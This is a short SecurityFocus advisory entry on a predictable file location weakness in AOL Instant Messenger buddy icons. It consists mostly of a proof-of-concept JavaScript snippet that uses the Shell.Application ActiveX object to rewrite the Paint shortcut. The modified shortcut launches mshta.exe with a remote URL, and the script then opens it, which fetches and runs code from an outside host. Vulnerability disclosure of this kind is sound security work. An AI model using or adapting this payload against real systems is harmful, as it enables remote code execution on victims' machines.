AOL Instant Messenger Buddy Icon Predictable File Location Weakness

The following proof of concept example has been supplied:

<script>
var ok = new ActiveXObject("Shell.Application");
f = ok.NameSpace("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Accessories");
i= f.ParseName("Paint.lnk");
l = i.GetLink;
l.Path = "mshta.exe"
l.Arguments ="http://www.example.com"
l.Save("C:\\paint.lnk");
ok.Open("C:\\paint.lnk");
</script>


 

Privacy Statement
Copyright 2010, SecurityFocus